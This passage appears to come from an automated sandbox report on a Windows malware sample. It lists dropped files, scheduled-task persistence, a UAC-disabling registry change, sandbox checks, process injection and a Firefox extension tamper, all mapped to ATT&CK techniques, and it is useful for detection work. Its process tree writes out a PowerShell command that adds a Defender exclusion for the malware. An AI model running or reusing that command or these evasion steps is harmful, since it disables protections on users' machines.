File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\hIttrWk.dll	OQqdOxl.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	UlCYPbb.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\tNCsCeo.xml	OQqdOxl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OQqdOxl.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\PbcGscJ.dll	UlCYPbb.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\CnaQFgMkmgevM.dll	OQqdOxl.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\UbvoIDg.xml	OQqdOxl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	UlCYPbb.exe
File created	C:\Program Files (x86)\ADJLsahCU\nQgkgv.dll	OQqdOxl.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\tJQaEPZ.dll	OQqdOxl.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\XlLdTbz.dll	UlCYPbb.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	UlCYPbb.exe
File created	C:\Program Files (x86)\ADJLsahCU\WcIeRqd.xml	UlCYPbb.exe
File created	C:\Program Files (x86)\ADJLsahCU\xPGjhGg.xml	OQqdOxl.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\TVoIsuWixRObj.dll	UlCYPbb.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\UrOwcOm.xml	OQqdOxl.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\FvJrrQa.xml	UlCYPbb.exe
File created	C:\Program Files (x86)\ADJLsahCU\VIuiRb.dll	UlCYPbb.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	UlCYPbb.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	Z7gEesF5i729dkMqNVYOlP1M.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\rrqYunoktxOQmCoCX.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	wnoBQ6erADVdRUmpBaoc4kJO.exe
File created	C:\Windows\rss\csrss.exe	xqFR9DclKTs7bU8XGwKY57e3.exe
File opened for modification	C:\Windows\rss	kubHbUH22R5cJMfEfeEVON21.exe
File opened for modification	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File opened for modification	C:\Windows\rss	xqFR9DclKTs7bU8XGwKY57e3.exe
File opened for modification	C:\Windows\rss	Z7gEesF5i729dkMqNVYOlP1M.exe
File opened for modification	C:\Windows\rss	wnoBQ6erADVdRUmpBaoc4kJO.exe
File created	C:\Windows\rss\csrss.exe	kubHbUH22R5cJMfEfeEVON21.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5436	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1c4.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1c4.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1c4.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1c4.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1c4.0.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5736	schtasks.exe
6464	schtasks.exe
5392	schtasks.exe
3552	schtasks.exe
4240	schtasks.exe
6140	schtasks.exe
5196	schtasks.exe
2476	schtasks.exe
1592	schtasks.exe
5652	schtasks.exe
5676	schtasks.exe
348	schtasks.exe
6844	schtasks.exe
6260	schtasks.exe
3688	schtasks.exe
5932	schtasks.exe
6732	schtasks.exe
3468	schtasks.exe
5784	schtasks.exe
6228	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	OQqdOxl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	UlCYPbb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Z7gEesF5i729dkMqNVYOlP1M.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe
2656	powershell.exe
2656	powershell.exe
4196	powershell.exe
4196	powershell.exe
2920	powershell.exe
2920	powershell.exe
2428	powershell.exe
2428	powershell.exe
2656	powershell.exe
4196	powershell.exe
2428	powershell.exe
2920	powershell.exe
2656	powershell.exe
4196	powershell.exe
2428	powershell.exe
2920	powershell.exe
2808	u1c4.0.exe
2808	u1c4.0.exe
4752	xqFR9DclKTs7bU8XGwKY57e3.exe
4752	xqFR9DclKTs7bU8XGwKY57e3.exe
1356	wnoBQ6erADVdRUmpBaoc4kJO.exe
1356	wnoBQ6erADVdRUmpBaoc4kJO.exe
2736	kubHbUH22R5cJMfEfeEVON21.exe
2736	kubHbUH22R5cJMfEfeEVON21.exe
2304	Z7gEesF5i729dkMqNVYOlP1M.exe
2304	Z7gEesF5i729dkMqNVYOlP1M.exe
6024	powershell.exe
6024	powershell.exe
6024	powershell.exe
6040	powershell.exe
6040	powershell.exe
5900	powershell.exe
5900	powershell.exe
6044	powershell.exe
6044	powershell.exe
6040	powershell.exe
5900	powershell.exe
6044	powershell.exe
6024	powershell.exe
6040	powershell.exe
5900	powershell.exe
6044	powershell.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
6224	powershell.exe
6224	powershell.exe
6224	powershell.exe
5220	xqFR9DclKTs7bU8XGwKY57e3.exe
5220	xqFR9DclKTs7bU8XGwKY57e3.exe
5220	xqFR9DclKTs7bU8XGwKY57e3.exe
5220	xqFR9DclKTs7bU8XGwKY57e3.exe
5208	wnoBQ6erADVdRUmpBaoc4kJO.exe
5208	wnoBQ6erADVdRUmpBaoc4kJO.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	4648	msbuild.exe
Token: SeIncreaseQuotaPrivilege	1412	powershell.exe
Token: SeSecurityPrivilege	1412	powershell.exe
Token: SeTakeOwnershipPrivilege	1412	powershell.exe
Token: SeLoadDriverPrivilege	1412	powershell.exe
Token: SeSystemProfilePrivilege	1412	powershell.exe
Token: SeSystemtimePrivilege	1412	powershell.exe
Token: SeProfSingleProcessPrivilege	1412	powershell.exe
Token: SeIncBasePriorityPrivilege	1412	powershell.exe
Token: SeCreatePagefilePrivilege	1412	powershell.exe
Token: SeBackupPrivilege	1412	powershell.exe
Token: SeRestorePrivilege	1412	powershell.exe
Token: SeShutdownPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeSystemEnvironmentPrivilege	1412	powershell.exe
Token: SeRemoteShutdownPrivilege	1412	powershell.exe
Token: SeUndockPrivilege	1412	powershell.exe
Token: SeManageVolumePrivilege	1412	powershell.exe
Token: 33	1412	powershell.exe
Token: 34	1412	powershell.exe
Token: 35	1412	powershell.exe
Token: 36	1412	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	4752	xqFR9DclKTs7bU8XGwKY57e3.exe
Token: SeImpersonatePrivilege	4752	xqFR9DclKTs7bU8XGwKY57e3.exe
Token: SeDebugPrivilege	1356	wnoBQ6erADVdRUmpBaoc4kJO.exe
Token: SeImpersonatePrivilege	1356	wnoBQ6erADVdRUmpBaoc4kJO.exe
Token: SeDebugPrivilege	2736	kubHbUH22R5cJMfEfeEVON21.exe
Token: SeImpersonatePrivilege	2736	kubHbUH22R5cJMfEfeEVON21.exe
Token: SeDebugPrivilege	2304	Z7gEesF5i729dkMqNVYOlP1M.exe
Token: SeImpersonatePrivilege	2304	Z7gEesF5i729dkMqNVYOlP1M.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeDebugPrivilege	5900	powershell.exe
Token: SeDebugPrivilege	6044	powershell.exe
Token: SeDebugPrivilege	6224	powershell.exe
Token: SeDebugPrivilege	6728	powershell.exe
Token: SeDebugPrivilege	6812	powershell.exe
Token: SeDebugPrivilege	6892	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	7012	powershell.exe
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeIncreaseQuotaPrivilege	5036	WMIC.exe
Token: SeSecurityPrivilege	5036	WMIC.exe
Token: SeTakeOwnershipPrivilege	5036	WMIC.exe
Token: SeLoadDriverPrivilege	5036	WMIC.exe
Token: SeSystemProfilePrivilege	5036	WMIC.exe
Token: SeSystemtimePrivilege	5036	WMIC.exe
Token: SeProfSingleProcessPrivilege	5036	WMIC.exe
Token: SeIncBasePriorityPrivilege	5036	WMIC.exe
Token: SeCreatePagefilePrivilege	5036	WMIC.exe
Token: SeBackupPrivilege	5036	WMIC.exe
Token: SeRestorePrivilege	5036	WMIC.exe
Token: SeShutdownPrivilege	5036	WMIC.exe
Token: SeDebugPrivilege	5036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5036	WMIC.exe
Token: SeRemoteShutdownPrivilege	5036	WMIC.exe
Token: SeUndockPrivilege	5036	WMIC.exe
Token: SeManageVolumePrivilege	5036	WMIC.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe
2476	u1c4.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4448 wrote to memory of 1412	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	73
PID 4448 wrote to memory of 1412	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	73
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4448 wrote to memory of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75
PID 4648 wrote to memory of 1356	4648	msbuild.exe	299
PID 4648 wrote to memory of 1356	4648	msbuild.exe	299
PID 4648 wrote to memory of 1356	4648	msbuild.exe	299
PID 4648 wrote to memory of 4752	4648	msbuild.exe	80
PID 4648 wrote to memory of 4752	4648	msbuild.exe	80
PID 4648 wrote to memory of 4752	4648	msbuild.exe	80
PID 4648 wrote to memory of 2736	4648	msbuild.exe	81
PID 4648 wrote to memory of 2736	4648	msbuild.exe	81
PID 4648 wrote to memory of 2736	4648	msbuild.exe	81
PID 4648 wrote to memory of 1732	4648	msbuild.exe	82
PID 4648 wrote to memory of 1732	4648	msbuild.exe	82
PID 4648 wrote to memory of 1732	4648	msbuild.exe	82
PID 4648 wrote to memory of 2304	4648	msbuild.exe	83
PID 4648 wrote to memory of 2304	4648	msbuild.exe	83
PID 4648 wrote to memory of 2304	4648	msbuild.exe	83
PID 2736 wrote to memory of 2656	2736	kubHbUH22R5cJMfEfeEVON21.exe	86
PID 2736 wrote to memory of 2656	2736	kubHbUH22R5cJMfEfeEVON21.exe	86
PID 2736 wrote to memory of 2656	2736	kubHbUH22R5cJMfEfeEVON21.exe	86
PID 2304 wrote to memory of 4196	2304	Z7gEesF5i729dkMqNVYOlP1M.exe	375
PID 2304 wrote to memory of 4196	2304	Z7gEesF5i729dkMqNVYOlP1M.exe	375
PID 2304 wrote to memory of 4196	2304	Z7gEesF5i729dkMqNVYOlP1M.exe	375
PID 4752 wrote to memory of 2428	4752	xqFR9DclKTs7bU8XGwKY57e3.exe	89
PID 4752 wrote to memory of 2428	4752	xqFR9DclKTs7bU8XGwKY57e3.exe	89
PID 4752 wrote to memory of 2428	4752	xqFR9DclKTs7bU8XGwKY57e3.exe	89
PID 1356 wrote to memory of 2920	1356	wnoBQ6erADVdRUmpBaoc4kJO.exe	91
PID 1356 wrote to memory of 2920	1356	wnoBQ6erADVdRUmpBaoc4kJO.exe	91
PID 1356 wrote to memory of 2920	1356	wnoBQ6erADVdRUmpBaoc4kJO.exe	91
PID 1732 wrote to memory of 2808	1732	FMRHImqKyRfmTuFwEnMaRCJU.exe	93
PID 1732 wrote to memory of 2808	1732	FMRHImqKyRfmTuFwEnMaRCJU.exe	93
PID 1732 wrote to memory of 2808	1732	FMRHImqKyRfmTuFwEnMaRCJU.exe	93
PID 1732 wrote to memory of 2476	1732	FMRHImqKyRfmTuFwEnMaRCJU.exe	324
PID 1732 wrote to memory of 2476	1732	FMRHImqKyRfmTuFwEnMaRCJU.exe	324
PID 1732 wrote to memory of 2476	1732	FMRHImqKyRfmTuFwEnMaRCJU.exe	324
PID 4648 wrote to memory of 5316	4648	msbuild.exe	97
PID 4648 wrote to memory of 5316	4648	msbuild.exe	97
PID 5132 wrote to memory of 6024	5132	Z7gEesF5i729dkMqNVYOlP1M.exe	104
PID 5132 wrote to memory of 6024	5132	Z7gEesF5i729dkMqNVYOlP1M.exe	104
PID 5132 wrote to memory of 6024	5132	Z7gEesF5i729dkMqNVYOlP1M.exe	104
PID 5208 wrote to memory of 5900	5208	wnoBQ6erADVdRUmpBaoc4kJO.exe	377
PID 5208 wrote to memory of 5900	5208	wnoBQ6erADVdRUmpBaoc4kJO.exe	377
PID 5208 wrote to memory of 5900	5208	wnoBQ6erADVdRUmpBaoc4kJO.exe	377
PID 4648 wrote to memory of 6028	4648	msbuild.exe	106
PID 4648 wrote to memory of 6028	4648	msbuild.exe	106
PID 4648 wrote to memory of 6028	4648	msbuild.exe	106
PID 5152 wrote to memory of 6040	5152	kubHbUH22R5cJMfEfeEVON21.exe	109
PID 5152 wrote to memory of 6040	5152	kubHbUH22R5cJMfEfeEVON21.exe	109
PID 5152 wrote to memory of 6040	5152	kubHbUH22R5cJMfEfeEVON21.exe	109
PID 5220 wrote to memory of 6044	5220	xqFR9DclKTs7bU8XGwKY57e3.exe	110
PID 5220 wrote to memory of 6044	5220	xqFR9DclKTs7bU8XGwKY57e3.exe	110
PID 5220 wrote to memory of 6044	5220	xqFR9DclKTs7bU8XGwKY57e3.exe	110
PID 6028 wrote to memory of 1860	6028	oiy1vPScVPH1BoLNrDBhvei7.exe	113
PID 6028 wrote to memory of 1860	6028	oiy1vPScVPH1BoLNrDBhvei7.exe	113
PID 6028 wrote to memory of 1860	6028	oiy1vPScVPH1BoLNrDBhvei7.exe	113
PID 1860 wrote to memory of 816	1860	Install.exe	114

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe
"C:\Users\Admin\AppData\Local\Temp\18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1412
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4648
